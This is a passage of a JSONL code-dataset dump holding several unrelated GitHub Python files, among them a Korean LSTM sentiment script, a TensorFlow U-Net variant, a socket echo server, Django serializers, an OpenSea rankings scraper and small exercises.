parser\n","repo_name":"ML4SCI/QMLHEP","sub_path":"Quantum_CNN_for_HEP_Gopal_Ramesh_Dahale/qml_hep_lhc/models/quantum/qcnn_cong.py","file_name":"qcnn_cong.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"96"} +{"seq_id":"18639144407","text":"import tensorflow as tf\nfrom tensorflow.keras.optimizers import SGD, Adam\nfrom tensorflow.keras.layers import Embedding, Dense, LSTM,Flatten\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint\n\n\n\n\nfrom tensorflow.keras.preprocessing.text import Tokenizer\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\nfrom tensorflow.keras.utils import to_categorical\n\nimport numpy as np\nimport pandas as pd\nfrom pandas import DataFrame\nimport matplotlib.pyplot as plt\n\nimport itertools\n\nfrom konlpy.tag import Okt\nfrom konlpy.tag import Mecab\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sentence_transformers import SentenceTransformer\n\nfrom pykospacing import Spacing\n\n\n\n\nimport sys\n\n\nspacing = Spacing()\n\nlist1=[]\nlist2=[]\n\nf = open(\"a1.txt\", 'r')\nlines = f.readlines()\n\nfor line in lines:\n line = line.strip() # 줄 끝의 줄 바꿈 문자를 제거한다.\n list1.append(line)\n\ncharacters =\".,!?'()\"\n\n\nfor i in range(len(list1)):\n word1 = list1[i].replace(characters[0],\" \")\n word1 = word1.replace(characters[1],\" \")\n word1 = word1.replace(characters[2],\" \")\n word1 = word1.replace(characters[3],\" \")\n word1 = word1.replace(characters[4],\" \")\n word1 = word1.replace(characters[5],\" \")\n word1 = word1.replace(characters[6],\" \")\n word1 = word1.split('|')\n \n list2.append(word1)\n\narr=np.array(list2)\narr=np.delete(arr,(0),axis=0)\narr=np.delete(arr,(0),axis=1)\n\nans1= []\nans2= []\nans3= []\narr2 =[]\n\nfor i in range(len(arr)):\n ans1.append(arr[i][0])\n ans2.append(arr[i][1])\n ans3.append(arr[i][2])\n arr2.append(arr[i][3:6])\n \n\nokt = Okt()\nmecab = Mecab(dicpath=r\"C:/mecab/mecab-ko-dic\")\n\nno1=[]\nno2=[]\nno3=[]\n\narr3=[]\n\n\nfor i in range(len(arr2)):\n arr3.append(arr2[i][0]+\" \"+arr2[i][1]+\" \"+arr2[i][2])\n\nokt1 =[]\n\nfor i in range(10000):\n a = okt.nouns(arr2[i][0]) \n b = okt.nouns(arr2[i][1])\n c = okt.nouns(arr2[i][2])\n d = okt.nouns(arr2[i][0])+okt.nouns(arr2[i][1])+okt.nouns(arr2[i][2])\n e = okt.nouns(arr3[i])\n okt1.append(list(set(d+e)))\n\nprint('----------------------')\n\n\nmecab1 =[]\n#with open('no1.txt','w',encoding='UTF-8') as s:\n \nfor i in range(10000):\n a = mecab.nouns(arr2[i][0]) \n b = mecab.nouns(arr2[i][1])\n c = mecab.nouns(arr2[i][2])\n d = mecab.nouns(arr2[i][0])+okt.nouns(arr2[i][1])+okt.nouns(arr2[i][2])\n e = mecab.nouns(arr3[i])\n mecab1.append(list(set(d+e)))\n\n \n#s.close()\n\n\n\n\n\n\n\nmix1 =[]\n\nfor i in range(10000):\n mix1.append(list(set(okt1[i]+mecab1[i])))\n\ntokenizer = Tokenizer()\ntokenizer2 = Tokenizer()\n\ntokenizer.fit_on_texts(mix1[0:10000])\ntokenizer2.fit_on_texts(ans1[0:10000])\n\nvocab_size = len(tokenizer.word_index)\nvocab_size2 = len(tokenizer2.word_index)\n\ntokenizer = Tokenizer(vocab_size)\ntokenizer2 = Tokenizer(vocab_size2)\n\ntokenizer.fit_on_texts(mix1[0:10000])\ntokenizer2.fit_on_texts(ans1[0:10000])\n\n\n\nX_train = tokenizer.texts_to_sequences(mix1[0:10000])\ny_train = tokenizer2.texts_to_sequences(ans1[0:10000])\n\nprint('리뷰의 최대 길이 :',max(len(review) for review in mix1))\nprint('리뷰의 평균 길이 :',sum(map(len, mix1))/len(mix1))\n\nmax_len=16\nmax_len2=1\n\n\nX_train = pad_sequences(X_train, maxlen=max_len)\ny_train = pad_sequences(y_train, maxlen=max_len2)\n\n\nembedding_dim = 100\nhidden_units = 128\n\nmodel = Sequential()\nmodel.add(Embedding(vocab_size, embedding_dim))\nmodel.add(LSTM(hidden_units))\nmodel.add(Dense(1, activation='sigmoid'))\n\nes = EarlyStopping(monitor='val_loss', mode='min', verbose=1, patience=3)\nmc = ModelCheckpoint('best_model.h5', monitor='val_acc', mode='max', verbose=1, save_best_only=True)\n\nmodel.compile(optimizer='rmsprop', loss='binary_crossentropy', metrics=['acc'])\nhistory = model.fit(X_train, y_train, epochs=1,callbacks=[es, mc], batch_size=64,validation_split=0.2)\n\n\n#loaded_model = load_model('best_model.h5')\n#print(\"\\n 테스트 정확도: %.4f\" % (loaded_model.evaluate(X_train, y_train)[1]))\n\n\ndef sentiment_predict(new_sentence):\n new_sentence = re.sub(r'[^ㄱ-ㅎㅏ-ㅣ가-힣 ]','', new_sentence)\n new_sentence = okt.morphs(new_sentence, stem=True) # 토큰화\n new_sentence = [word for word in new_sentence if not word in stopwords] # 불용어 제거\n encoded = tokenizer.texts_to_sequences([new_sentence]) # 정수 인코딩\n pad_new = pad_sequences(encoded, maxlen = max_len) # 패딩\n score = float(loaded_model.predict(pad_new)) # 예측\n if(score > 0.5):\n print(\"{:.2f}% 확률로 긍정 리뷰입니다.\\n\".format(score * 100))\n else:\n print(\"{:.2f}% 확률로 부정 리뷰입니다.\\n\".format((1 - score) * 100))\n","repo_name":"bellkjtt/competition","sub_path":"word.py","file_name":"word.py","file_ext":"py","file_size_in_byte":4736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"12664503712","text":"from __future__ import print_function, division\n\nimport numpy as np\nimport tensorflow as tf\n\nHACK_USE_LAST_VALUE = False\n\nclass ErrorUNet:\n # Create network given a bunch of config parameters.\n def __init__(self, depth, topLayerWindow, kernelsPerLayer, learningRate, betweenLayerSize=1, errorWeight=1, batchSize=1):\n # variables:\n self.beVars = []\n self.eeVars = []\n self.feVars = []\n self.bfVars = []\n self.efVars = []\n self.ffVars = []\n\n # Placeholders:\n self.oldFLayers = []\n self.oldELayers = []\n self.ELayers = []\n self.FLayers = []\n\n # State:\n self.prevELayers = []\n\n # Optimization:\n self.errorLoss = None\n self.predictionLoss = None\n self.totalLoss = None\n\n self.depth = depth\n self.windowSize = topLayerWindow * (2 ** (depth - 1))\n self.kernelsPerLayer = kernelsPerLayer\n # Input fed into the network. (batchSize x windowSize)\n self.inputHolder = tf.placeholder(tf.float32, [batchSize, self.windowSize], name=\"In_F_0\")\n # Output of the network. (batchSize x windowSize)\n self.outputHolder = tf.placeholder(tf.float32, [batchSize, self.windowSize], name=\"Out\")\n\n # Create Variables:\n for at in range(depth):\n atS = str(at)\n self.eeVars.append(self.batch1dConv( 2, at == 0, False, \"eeVar_\" + atS)) # mega hack: transposed conv2d invert out & in channel params\n self.feVars.append(self.batch1dConv(betweenLayerSize, at == 0, at == 0, \"feVar_\" + atS))\n self.efVars.append(self.batch1dConv(betweenLayerSize, at == 0, at == 0, \"efVar_\" + atS))\n self.ffVars.append(self.batch1dConv( 2, at == 1, False, \"ffVar_\" + atS))\n\n # Old Forward value placeholders:\n for at in range(depth):\n atS = str(at)\n windowSize = topLayerWindow * (2 ** (depth - 1 - at))\n print (\"NODES on level \" + str(at) + \" = \" + str(windowSize))\n channels = 1 if at == 0 else self.kernelsPerLayer\n self.oldELayers.append(tf.placeholder(tf.float32, [batchSize, windowSize, channels], name=\"oldE_\" + atS))\n self.prevELayers.append(np.random.randn(batchSize, windowSize, channels))\n self.beVars.append(self.batch1dConv(windowSize, at == 0, at == 0, \"beVar_\" + atS, isBias=True))\n self.bfVars.append(self.batch1dConv(windowSize, at == 0, at == 0, \"bfVar_\" + atS, isBias=True))\n\n print(\"BUILDING, old E -> old F\")\n # New Forward value placeholders:\n lastLayer = None\n for at in range(depth):\n print (\"Wiring OLD FORDWARD level \" + str(at) + \"...\")\n fLayer = None\n if at == 0:\n # B x W => B x W x 1\n inputExpanded = tf.expand_dims(self.inputHolder, 2)\n fLayer = inputExpanded\n else:\n fLayer = self.convWithBias(\"oldF_\" + str(at), [\n (lastLayer, self.ffVars[at], 'FF'),\n (self.oldELayers[at], self.efVars[at], 'EF')\n ], self.bfVars[at])\n self.oldFLayers.append(fLayer)\n lastLayer = fLayer\n\n\n # New Error value placeholders:\n print(\"BUILDING, old F -> new E\")\n lastLayer = None\n for at in range(depth - 1, -1, -1):\n print (\"Wiring ERROR level \" + str(at) + \"...\")\n eLayer = None\n if at == depth - 1:\n eLayer = self.convWithBias(\"E_\" + str(at), [\n (self.oldFLayers[at], self.feVars[at], 'FE')\n ], self.beVars[at])\n else:\n eLayer = self.convWithBias(\"E_\" + str(at), [\n (lastLayer, self.eeVars[at], 'EE'),\n (self.oldFLayers[at], self.feVars[at], 'FE')\n ], self.beVars[at])\n self.ELayers.append(eLayer)\n lastLayer = eLayer\n self.ELayers.reverse()\n\n # New Forward value placeholders:\n print(\"BUILDING, new E -> new F\")\n lastLayer = None\n for at in range(depth):\n print (\"Wiring FORDWARD level \" + str(at) + \"...\")\n fLayer = None\n if at == 0:\n # B x W => B x W x 1\n inputExpanded = tf.expand_dims(self.inputHolder, 2)\n fLayer = inputExpanded\n else:\n fLayer = self.convWithBias(\"F_\" + str(at), [\n (lastLayer, self.ffVars[at], 'FF'),\n (self.ELayers[at], self.efVars[at], 'EF')\n ], self.bfVars[at])\n self.FLayers.append(fLayer)\n lastLayer = fLayer\n\n # Debugging code:\n print (\"E and F layer sizes:\")\n for el in self.ELayers:\n print (el.get_shape())\n for fl in self.FLayers:\n print (fl.get_shape())\n\n # B x W => B x W x 1\n outHolderResized = tf.expand_dims(self.outputHolder, 2)\n\n if errorWeight == 0:\n # Without error loss, use the E layers as predictions (like UNet), not errors.\n self.prediction = self.ELayers[0]\n self.errorLoss = tf.constant(0)\n self.predictionLoss = tf.nn.l2_loss(self.prediction - outHolderResized) / self.windowSize\n self.totalLoss = self.predictionLoss\n else:\n # Output = Last Input plus predicted error\n self.prediction = self.FLayers[0] + self.ELayers[0]\n allNewEButFirst = tf.concat(self.ELayers[1:], 1)\n allOldFButFirst = tf.concat(self.oldFLayers[1:], 1)\n allNewFButFirst = tf.concat(self.FLayers[1:], 1)\n actualErrors = (allNewFButFirst - allOldFButFirst)\n self.errorLoss = (\n tf.nn.l2_loss(actualErrors - allNewEButFirst) +\n tf.nn.l2_loss((self.FLayers[0] - self.oldFLayers[0]) - self.ELayers[0]) +\n tf.nn.l2_loss(allNewEButFirst)\n ) / self.windowSize\n self.predictionLoss = tf.nn.l2_loss(self.prediction - outHolderResized) / self.windowSize\n self.totalLoss = tf.add(self.errorLoss * errorWeight, self.predictionLoss)\n\n globalStep = tf.Variable(0, trainable=False)\n decayedLearningRate = \\\n tf.train.exponential_decay(learningRate, globalStep, 100, 0.75, staircase=True)\n self.optimizer = \\\n tf.train.AdamOptimizer(decayedLearningRate).minimize(self.totalLoss)\n # tf.train.GradientDescentOptimizer(decayedLearningRate).minimize(self.totalLoss)\n\n def batch1dConv(self, width, firstLayer, lastLayer, name, isBias=False):\n inChannels = 1 if firstLayer else self.kernelsPerLayer\n outChannels = 1 if lastLayer else self.kernelsPerLayer\n if isBias:\n # bias = B x W x C\n filt = tf.Variable(np.random.randn(width, inChannels) * 0.1, dtype=tf.float32, name=name)\n return tf.expand_dims(filt, 0)\n else:\n # kernels = W x C x C\n return tf.Variable(np.random.randn(width, inChannels, outChannels), dtype=tf.float32, name=name)\n\n def convWithBias(self, name, convolutions, bias):\n # TODO: Dilation, not stride?\n result = bias\n print (\" * bias shape (= output shape): \" + str(bias.get_shape()))\n for convolution in convolutions:\n value, kernel, cType = convolution\n print (\" + conv value shape:\" + str(value.get_shape()))\n print (\" * conv kernel shape: \" + str(kernel.get_shape()))\n print (\" * conv type: \" + cType)\n convResult = None\n if cType == 'EE':\n convResult = self.eeConv(value, kernel, name)\n elif cType == 'FF':\n convResult = self.ffConv(value, kernel)\n else:\n assert cType == 'FE' or cType == 'EF'\n convResult = self.efeConv(value, kernel)\n print (\" = result: \" + str(convResult.get_shape()))\n result = tf.add(result, convResult)\n activation = tf.nn.tanh(result)\n # activation = tf.nn.relu(result)\n # activation = tf.nn.tan(tf.nn.tanh(result))\n return tf.identity(activation, name=name + \"_activation\")\n\n def eeConv(self, eIn, kernel, name):\n # e layer 1D -> 2D: B x We x C -> B x We x 1 x C\n eIn2d = tf.expand_dims(eIn, 2)\n # filter, 1D -> 2D: Wk x C x C -> Wk x 1 x C x C\n kernel2d = tf.expand_dims(kernel, 1)\n eInShape = eIn2d.get_shape().as_list()\n kShape = kernel2d.get_shape().as_list()\n outShape = (eInShape[0], eInShape[1] * 2, eInShape[2], kShape[2])\n print (\"EIn2d shape = \" + str(eIn2d.get_shape()))\n print (\"kernel2d shape = \" + str(kernel2d.get_shape()))\n print (\"OutShape = \" + str(outShape))\n result = tf.nn.conv2d_transpose(eIn2d, kernel2d, output_shape=outShape, strides=[1, 2, 2, 1], name=name)\n return tf.squeeze(result, [2])\n\n def ffConv(self, fIn, kernel):\n return tf.nn.conv1d(fIn, kernel, stride=2, padding='VALID')\n\n def efeConv(self, value, kernel):\n return tf.nn.conv1d(value, kernel, stride=1, padding='SAME')\n\n def train(self, sess, inTensor, outTensor):\n # Given input and true output, update weights based from the optimizer\n if HACK_USE_LAST_VALUE:\n prediction = np.roll(inTensor, -1, axis=1)\n prediction[0, -1] = prediction[0, -2]\n err = outTensor - prediction\n errl2 = sum(sum(err ** 2)) / 2\n pLoss = errl2 / self.windowSize\n return 0, pLoss, pLoss\n\n inData = {\n self.inputHolder: inTensor,\n self.outputHolder: outTensor,\n }\n for i in range(len(self.oldFLayers)):\n inData[self.oldELayers[i]] = self.prevELayers[i]\n\n opt, eLayers, eLoss, pLoss, tLoss = sess.run(\n [self.optimizer, self.ELayers, self.errorLoss, self.predictionLoss, self.totalLoss],\n feed_dict=inData\n )\n self.prevELayers = eLayers\n return eLoss, pLoss, tLoss\n\n def generate(self, sess, inTensor):\n # Given input, generate the predicted output.\n if HACK_USE_LAST_VALUE:\n prediction = np.roll(inTensor, -1, axis=1)\n prediction[0, -1] = prediction[0, -2]\n return prediction\n\n inData = {\n self.inputHolder: inTensor,\n }\n for i in range(len(self.oldELayers)):\n inData[self.oldELayers[i]] = self.prevELayers[i]\n prediction, eLayers = sess.run([self.prediction, self.ELayers], feed_dict=inData)\n self.prefELayers = eLayers\n return prediction[:, :, 0]\n\n def debugValues(self, sess, inTensor):\n # Print all the variables and placeholders when given a particular input.\n inData = {\n self.inputHolder: inTensor,\n }\n for i in range(len(self.oldELayers)):\n inData[self.oldELayers[i]] = self.prevELayers[i]\n\n [beVars, eeVars, feVars, bfVars, efVars, ffVars, ELayers, FLayers] = sess.run(\n [self.beVars, self.eeVars, self.feVars, self.bfVars, self.efVars, self.ffVars, self.ELayers, self.FLayers],\n feed_dict=inData\n )\n self.debugBE(beVars)\n self.debugEE(eeVars)\n self.debugFE(feVars)\n self.debugBF(bfVars)\n self.debugEF(efVars)\n self.debugFF(ffVars)\n self.debugOldF(self.prevFLayers)\n self.debugE(ELayers)\n self.debugF(FLayers)\n\n def debugBE(self, beVars):\n for i in range(len(beVars)):\n print (\"be_%d = %s\" % (i, str(beVars[i][0, :, 0])))\n\n def debugEE(self, eeVars):\n for i in range(len(eeVars)):\n print (\"ee_%d = %s\" % (i, str(eeVars[i][0, :, 0])))\n\n def debugFE(self, feVars):\n for i in range(len(feVars)):\n print (\"fe_%d = %s\" % (i, str(feVars[i][0, :, 0])))\n\n def debugBF(self, bfVars):\n for i in range(len(bfVars)):\n print (\"bf_%d = %s\" % (i, str(bfVars[i][0, :, 0])))\n\n def debugEF(self, efVars):\n for i in range(len(efVars)):\n print (\"ef_%d = %s\" % (i, str(efVars[i][0, :, 0])))\n\n def debugFF(self, ffVars):\n for i in range(len(ffVars)):\n print (\"ff_%d = %s\" % (i, str(ffVars[i][0, :, 0])))\n\n def debugOldF(self, oldFLayers):\n for i in range(len(oldFLayers)):\n print (\"oldF_%d = %s\" % (i, str(oldFLayers[i][0, :, 0])))\n\n def debugE(self, ELayers):\n for i in range(len(ELayers)):\n print (\"E_%d = %s\" % (i, str(ELayers[i][0, :, 0])))\n\n def debugF(self, FLayers):\n for i in range(len(FLayers)):\n print (\"F_%d = %s\" % (i, str(FLayers[i][0, :, 0])))\n","repo_name":"padster/Error-UNet","sub_path":"errorUnet.py","file_name":"errorUnet.py","file_ext":"py","file_size_in_byte":12757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"34849210837","text":"from socket import *\naddress='172.16.0.5' #监听哪些网络 127.0.0.1是监听本机 0.0.0.0是监听整个网络\nport=8080 #监听自己的哪个端口\nbuffsize=1024 #接收从客户端发来的数据的缓存区大小\ns = socket(AF_INET, SOCK_STREAM)\ns.bind((address,port))\ns.listen(1) #最大连接数\ndict={\"qwertyuiop\":1}\n\nprint(\"Server Start!\")\nwhile True:\n clientsock,clientaddress=s.accept()\n print('connect from:',clientaddress)\n#传输数据都利用clientsock,和s无关\n while True:\n recvdata=clientsock.recv(buffsize).decode('utf-8')\n if recvdata=='exit' or not recvdata:\n break\n senddata=recvdata+'from sever'\n print(senddata)\n if(senddata in dict):\n dict[senddata]=dict[senddata]-1\n clientsock.send(senddata.encode())\n clientsock.close()\ns.close()\n","repo_name":"JunJianX/Reward","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"40150875348","text":"'''def wish(name):\r\n print(\"Hello,\", name,\"How are you doing\")\r\n\r\nwish(\"akash\")\r\nwish(\"Bhanu\")\r\nwish(\"Tiwari\")\r\n'''\r\n\r\n'''def number(n):\r\n print(\"The square of\\t\",n,\"=>\\t\",n*n)\r\n\r\nnumber(10)\r\nnumber(11)\r\n'''\r\n\r\ndef number():\r\n n=int(input(\"Enter a number=>\\t\"))\r\n if n%2==1:\r\n print(n,\"is prime number\")\r\n elif n%2==0:\r\n print(n,\"is EVEN number\")\r\n else:\r\n print(n,\"is ODD number\")\r\nnumber()\r\n","repo_name":"akashbhanu009/Functions","sub_path":"Basic_Function_Call.py","file_name":"Basic_Function_Call.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"16956694671","text":"from django.contrib.auth.models import User\nfrom rest_framework import serializers\n\nfrom base import settings\nfrom versioning.models import Revision, Document\n\n\nclass RevisionSerializer(serializers.ModelSerializer):\n class Meta:\n model = Revision\n fields = ['id', 'created', 'file', 'index', 'revision_url']\n\n\nclass DocumentSerializer(serializers.Serializer):\n id = serializers.IntegerField(read_only=True)\n created = serializers.DateTimeField(read_only=True)\n url = serializers.CharField(allow_blank=False)\n revisions = serializers.HyperlinkedRelatedField(read_only=True, many=True, view_name='revision-detail')\n file = serializers.FileField(write_only=True)\n\n\n\nclass UserSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = User\n fields = ('url', 'id', 'username')\n","repo_name":"dimliakop/django","sub_path":"versioning/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"42172017557","text":"import flet as ft\n\n\nclass Navigation(ft.Row):\n def __init__(\n self,\n page: ft.Page,\n alignment=\"center\",\n ):\n self.page = page\n\n super().__init__(alignment=alignment)\n self.controls = [\n self.route(\"Home\", \"/index\"),\n self.route(\"About\", \"/about\"),\n self.route(\"Contact\", \"/contact/index\"),\n ]\n\n def route(self, title: str, route_to: str) -> ft.Control:\n return ft.Text(\n size=11,\n weight=\"bold\",\n color=\"white\",\n spans=[ft.TextSpan(title, on_click=lambda __: self.page.go(route_to))],\n )\n","repo_name":"LineIndent/fletxible","sub_path":"src/core/navigation.py","file_name":"navigation.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"96"} +{"seq_id":"9800536092","text":"import math\nimport os\n\nCRT_WIDTH = 40\nCRT_HEIGHT = 6\nSIGNAL_INTERVAL = 40\nSIGNAL_OFFSET = 20\nNOOP = \"noop\"\nDARK_PX = \".\"\nLIGHT_PX = \"#\"\n\n\ndef main():\n with open(os.path.dirname(__file__) + \"/input.txt\") as f:\n lines = f.read().split(\"\\n\")\n\n crt = [[DARK_PX for _ in range(CRT_WIDTH)] for _ in range(CRT_HEIGHT)]\n\n signals = []\n cycle = 0\n x = 1\n for line in lines:\n update_crt(crt, cycle, x)\n cycle += 1\n append_if_interesting_cycle(signals, cycle, x)\n if line != NOOP:\n update_crt(crt, cycle, x)\n cycle += 1\n append_if_interesting_cycle(signals, cycle, x)\n x += int(line.split()[1])\n\n print(sum(signals))\n print(render_crt(crt))\n\n\ndef render_crt(crt):\n return \"\\n\".join(map(lambda row: \"\".join(row), crt))\n\n\ndef update_crt(crt, cycle, x):\n row = math.floor(cycle / CRT_WIDTH)\n col = cycle % CRT_WIDTH\n\n if abs(x - col) <= 1:\n crt[row][col] = LIGHT_PX\n\n\ndef append_if_interesting_cycle(signals, cycle, signal):\n if is_interesting_cycle(cycle):\n signals.append(cycle * signal)\n\n\ndef is_interesting_cycle(n):\n return (n + SIGNAL_OFFSET) % SIGNAL_INTERVAL == 0\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ngerritsen/advent-of-code-2022","sub_path":"src/10/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"36532107062","text":"from pokemon_battle.pokemon import Pokemon\n\n\nclass Trainer:\n def __init__(self, name):\n self.name = name\n self.pokemon = []\n self.pokemon_obj = []\n\n def add_pokemon(self, pokemon: Pokemon):\n if pokemon.name in self.pokemon:\n return \"This pokemon is already caught\"\n\n self.pokemon.append(pokemon.name)\n self.pokemon_obj.append(pokemon)\n return f\"Caught {pokemon.pokemon_details()}\"\n\n def release_pokemon(self, pokemon_name: str):\n if pokemon_name not in self.pokemon:\n return \"Pokemon is not caught\"\n\n self.pokemon.remove(pokemon_name)\n self.find_obj(pokemon_name)\n return f\"You have released {pokemon_name}\"\n\n def find_obj(self, pokemon_name):\n for poke in self.pokemon_obj:\n if poke.name == pokemon_name:\n self.pokemon_obj.remove(poke)\n break\n\n def trainer_data(self):\n output = f\"Pokemon Trainer {self.name}\\nPokemon count {len(self.pokemon)}\\n\"\n for poke in self.pokemon_obj:\n output += '- ' + poke.pokemon_details() + '\\n'\n return output.rstrip()\n\n\npokemon = Pokemon(\"Pikachu\", 90)\nprint(pokemon.pokemon_details())\ntrainer = Trainer(\"Ash\")\nprint(trainer.add_pokemon(pokemon))\nsecond_pokemon = Pokemon(\"Charizard\", 110)\nprint(trainer.add_pokemon(second_pokemon))\nprint(trainer.release_pokemon(\"Pikachu\"))\nprint(trainer.trainer_data())\n","repo_name":"rzlatkov/Softuni","sub_path":"OOP/Defining_Classes/pokemon_battle/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"18151452832","text":"\nfrom selenium import webdriver\nfrom selenium.webdriver.firefox.options import Options\nimport time \n\n\ndef openSeaWS():\n firefox_options = Options()\n firefox_options.add_argument(\"--headless\")\n driver = webdriver.Firefox(executable_path=r'./geckodriver',options=firefox_options)\n\n url = 'https://opensea.io/rankings'\n\n driver.maximize_window()\n\n response = driver.get(url)\n i= 1\n nftNames = []\n while(True):\n try:\n\n screen_height = driver.execute_script(\"return window.screen.height;\")\n\n i+=1 \n htmlTest = driver.find_element_by_xpath('/html/body/div[1]/div/main/div/div[2]/div/div[3]').get_attribute('outerHTML')\n print(f\"the html is {len(htmlTest)}\")\n if len(htmlTest)>124:\n\n\n button = driver.find_element_by_xpath('/html/body/div[1]/div/main/div/div[3]/button[2]')\n textNft = driver.find_element_by_xpath('/html/body/div[1]/div/main/div/div[2]/div/div[3]')\n\n nftNames.append(textNft.text)\n scroll_height= driver.execute_script(\"return document.body.scrollHeight;\")\n time.sleep(5)\n print(f\"the value of i is: {i}\")\n print(f\"the screen height is: {screen_height}\")\n print(f\"the scroll height is:{scroll_height}\")\n driver.execute_script(\"window.scrollTo(0,{screen_height}*{i});\".format(screen_height=screen_height,i=i))\n print(f\"the screen height * i = {screen_height*i}\")\n if (screen_height)* i > scroll_height:\n print(\"if is being trigger\")\n i = 1\n button.click()\n time.sleep(10)\n else:\n print(\"the inner html is lower that 124\")\n break\n except:\n print(\"braking\")\n break\n\n\n driver.quit()\n\n with open('nftCollections.txt','w') as f:\n for nfts in nftNames:\n f.write(\"%s\\n\" % nfts)\n print(\"Done writing the file\")\n\nif __name__ =='__main__':\n openSeaWS() ","repo_name":"JaimeHidalgo/dockerOS","sub_path":"openSeaWS.py","file_name":"openSeaWS.py","file_ext":"py","file_size_in_byte":2089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"35210571987","text":"import pickle\nimport numpy as np\nimport pandas as pd\nimport csv\nfrom collections import Counter\n\ndef big_array():\n # task index in big array\n nodes_df = pd.read_csv('Foursquare/task_graph_X.csv')\n task_ids = list(set(nodes_df['node_name/poi_id'].tolist()))\n task_id2idx_dict = dict(zip(task_ids, range(len(task_ids))))\n # print(task_id2idx_dict)\n\n\n # worker index in big array\n nodes_df = pd.read_csv('Foursquare/worker_graph_X.csv')\n user_ids = list(set(nodes_df['node_name/worker_id'].tolist()))\n user_id2idx_dict = dict(zip(user_ids, range(len(user_ids))))\n # print(user_id2idx_dict)\n\n # big worker2task preference (2551, 9722)\n for i, w2t_pre in enumerate(worker2task_pre):\n user_id = w2t_pre[0].split('_')[0]\n max_val = np.max(w2t_pre[1:])\n min_val = np.min(w2t_pre[1:])\n w2t_list = w2t_pre[1:][0]\n w2t_list = np.ravel([(x - min_val) / (max_val - min_val) for x in w2t_pre[1:]])\n\n for j, t2w_pre in enumerate(task2worker_pre):\n task_id = int(t2w_pre[0].split('_')[0])\n big_arr_w2t[user_id2idx_dict[int(user_id)]][int(task_id2idx_dict[int(task_id)])] = w2t_list[task_id2idx_dict[int(task_id)]]\n\n # big task2worker preference (9722, 2551)\n for i, t2w_pre in enumerate(task2worker_pre):\n task_id = t2w_pre[0].split('_')[0]\n max_val = np.max(t2w_pre[1:])\n min_val = np.min(t2w_pre[1:])\n t2w_list = t2w_pre[1:][0]\n t2w_list = np.ravel([(x - min_val) / (max_val - min_val) for x in t2w_pre[1:]])\n\n for j, w2t_pre in enumerate(worker2task_pre):\n user_id = int(w2t_pre[0].split('_')[0])\n big_arr_t2w[int(task_id2idx_dict[int(task_id)])][user_id2idx_dict[int(user_id)]] = t2w_list[user_id2idx_dict[int(user_id)]]\n \n np.savetxt(\"GroundTruth_data/array_big_w2t.csv\", big_arr_w2t, delimiter=' ')\n np.savetxt(\"GroundTruth_data/array_big_t2w.csv\", big_arr_t2w, delimiter=' ')\n\n return big_arr_w2t, big_arr_t2w\n\n\ndef small_array(worker2task_pre, task2worker_pre, DATASET):\n # worker index in small array\n worker_list = [int(x.split('_')[0]) for x,_ in worker2task_pre]\n user_id2idx_dict_small = dict(zip(worker_list, range(len(worker_list))))\n # print(user_id2idx_dict_small)\n\n # task index in small array\n task_list = [int(x.split('_')[0]) for x,_ in task2worker_pre]\n task_id2idx_dict_small = dict(zip(task_list, range(len(task_list))))\n\n # small worker2task preference (1681, 3683)\n for i, w2t_pre in enumerate(worker2task_pre):\n user_id = w2t_pre[0].split('_')[0]\n max_val = np.max(w2t_pre[1:])\n min_val = np.min(w2t_pre[1:])\n w2t_list = w2t_pre[1:][0]\n w2t_list = np.ravel([(x - min_val) / (max_val - min_val) for x in w2t_pre[1:]])\n\n for j, t2w_pre in enumerate(task2worker_pre):\n task_id = int(t2w_pre[0].split('_')[0])\n small_arr_w2t[user_id2idx_dict_small[int(user_id)]][int(task_id2idx_dict_small[int(task_id)])] = float(w2t_list[task_id2idx_dict_small[int(task_id)]])\n \n # big task2worker preference (3683, 1681)\n for i, t2w_pre in enumerate(task2worker_pre):\n task_id = t2w_pre[0].split('_')[0]\n max_val = np.max(t2w_pre[1:])\n min_val = np.min(t2w_pre[1:])\n t2w_list = t2w_pre[1:][0]\n t2w_list = np.ravel([(x - min_val) / (max_val - min_val) for x in t2w_pre[1:]])\n\n for j, w2t_pre in enumerate(worker2task_pre):\n user_id = int(w2t_pre[0].split('_')[0])\n small_arr_t2w[int(task_id2idx_dict_small[int(task_id)])][user_id2idx_dict_small[int(user_id)]] = float(t2w_list[user_id2idx_dict_small[int(user_id)]])\n \n if DATASET == 'Foursquare':\n np.savetxt('GroundTruth_data/Foursquare/array_small_w2t.csv', small_arr_w2t, delimiter=',')\n np.savetxt('GroundTruth_data/Foursquare/array_small_t2w.csv', small_arr_t2w, delimiter=',')\n if DATASET == 'Yelp':\n np.savetxt('GroundTruth_data/Yelp_FGRec/array_small_w2t.csv', small_arr_w2t, delimiter=',')\n np.savetxt('GroundTruth_data/Yelp_FGRec/array_small_t2w.csv', small_arr_t2w, delimiter=',')\n \n return small_arr_w2t, 